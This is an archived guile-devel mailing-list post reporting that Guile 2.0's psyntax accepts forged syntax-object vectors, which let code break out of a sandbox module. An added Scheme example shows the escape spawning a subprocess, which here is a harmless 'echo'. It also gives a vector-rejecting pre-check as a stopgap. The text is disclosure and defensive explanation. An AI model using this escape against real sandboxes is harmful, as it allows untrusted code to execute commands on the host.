unofficial mirror of guile-devel@gnu.org 
* Psyntax security hole prevents secure sandboxing in Guile
@ 2012-05-06 18:17 Mark H Weaver
  2012-05-07 11:58 ` Noah Lavine
  2012-05-07 16:31 ` Ludovic Courtès
From: Mark H Weaver @ 2012-05-06 18:17 UTC (permalink / raw)
  To: guile-devel

Hello all,

Every once in a while someone asks about secure sandboxing with Guile,
and generally the response is that it should be fairly easy, by creating
a module with carefully selected bindings, but there's nothing ready
"out of the box".

I just realized that psyntax has a security hole that prevents secure
sandboxing, and wanted to post this fact before it was forgotten.

The problem is that psyntax accepts syntax-objects in the input, and
syntax-objects are simply vectors (or sexps containing vectors).
Therefore, it is always possible to _forge_ syntax-objects that refer to
arbitrary bindings in arbitrary modules, even if the usual bindings of
'@' and '@@' are not available.

In particular (although this is an internal implementation detail that
you cannot rely upon!) in Guile 2.0 the following two expressions are
treated equivalently:

  (@@ (ice-9 popen) open-pipe*)

  #(syntax-object open-pipe* ((top)) (hygiene ice-9 popen))

I don't think we can plug this hole until 2.2.

     Mark



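The escape Mark describes, as an added example that is not part of the original post and not Guile's own code. It assumes Guile 2.0's internal vector layout for syntax objects exactly as shown in the post (`#(syntax-object name wrap module)`), uses a fresh module from `make-module` as the "sandbox", and has the host load `(ice-9 popen)` itself (the sandbox never imports it). The `contains-vector?` pre-check at the end is a stopgap of mine for hosts that must `eval` untrusted s-expressions today; it is not a fix the post proposes, and the post's point stands that psyntax itself needs the change.

```scheme
;; Added example: demonstrates the forged-syntax-object escape from the
;; post against a minimal sandbox module.  Relies on Guile 2.0 internals
;; (the 4-element syntax-object vector); that layout is not a stable API.

(use-modules (ice-9 popen)     ; loaded by the host, never by the sandbox
             (ice-9 rdelim))   ; read-line

;; A "sandbox": an anonymous module that imports only a few harmless
;; bindings from (guile).  Neither @ nor @@ nor anything from popen is
;; reachable by name from inside it.
(define (make-sandbox)
  (let ((m (make-module)))
    (module-use! m (resolve-interface '(guile)
                                      #:select '(+ - * list car cdr)))
    m))

(define (sandbox-eval expr)
  (eval expr (make-sandbox)))

;; 1. Benign input behaves as expected.
(format #t "benign: ~a~%" (sandbox-eval '(+ 1 2)))     ; 3

;; 2. The obvious route is closed: @@ is not bound in the sandbox, so this
;;    is just a call to an unbound variable and throws.
(catch #t
  (lambda () (sandbox-eval '(@@ (ice-9 popen) open-pipe*)))
  (lambda (key . args)
    (format #t "blocked by name: ~a~%" key)))

;; 3. The forged syntax-object from the post, built with VECTOR so it is
;;    plainly ordinary data the sandboxed program could have produced:
;;      #(syntax-object open-pipe* ((top)) (hygiene ice-9 popen))
(define forged-open-pipe*
  (vector 'syntax-object 'open-pipe* '((top)) '(hygiene ice-9 popen)))

;; psyntax resolves the vector as an identifier bound in (ice-9 popen),
;; so the "sandboxed" expression spawns a subprocess.
(let* ((port (sandbox-eval (list forged-open-pipe* OPEN_READ
                                 "echo" "sandbox escaped")))
       (line (read-line port)))
  (close-pipe port)
  (format #t "forged reference ran: ~a~%" line))

;; 4. Stopgap for hosts that eval untrusted data (assumption: mine, not
;;    from the post).  Forged syntax-objects must be carried in vectors,
;;    so refuse any datum containing a vector anywhere before expansion.
;;    This only screens data handed to eval; it does not change psyntax.
(define (contains-vector? x)
  (cond ((vector? x) #t)
        ((pair? x) (or (contains-vector? (car x))
                       (contains-vector? (cdr x))))
        (else #f)))

(define (checked-sandbox-eval expr)
  (if (contains-vector? expr)
      (throw 'sandbox-violation "vector in input (possible forged syntax-object)" expr)
      (sandbox-eval expr)))

(catch 'sandbox-violation
  (lambda ()
    (checked-sandbox-eval (list forged-open-pipe* OPEN_READ "echo" "x")))
  (lambda (key msg expr)
    (format #t "rejected before eval: ~a~%" msg)))
```

Note that the pre-check is only as good as the reader in front of it: anything that lets sandboxed code build a vector and feed it back into `eval`, `compile` or a macro defeats it, which is why the post says the real fix belongs in psyntax.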


Thread overview: 7+ messages
2012-05-06 18:17 Psyntax security hole prevents secure sandboxing in Guile Mark H Weaver
2012-05-07 11:58 ` Noah Lavine
2012-05-07 16:31 ` Ludovic Courtès
2012-05-07 17:44   ` Mark H Weaver
2012-05-07 18:25     ` Noah Lavine
2012-05-07 20:10       ` Andreas Rottmann
2012-05-08 14:41     ` Ludovic Courtès
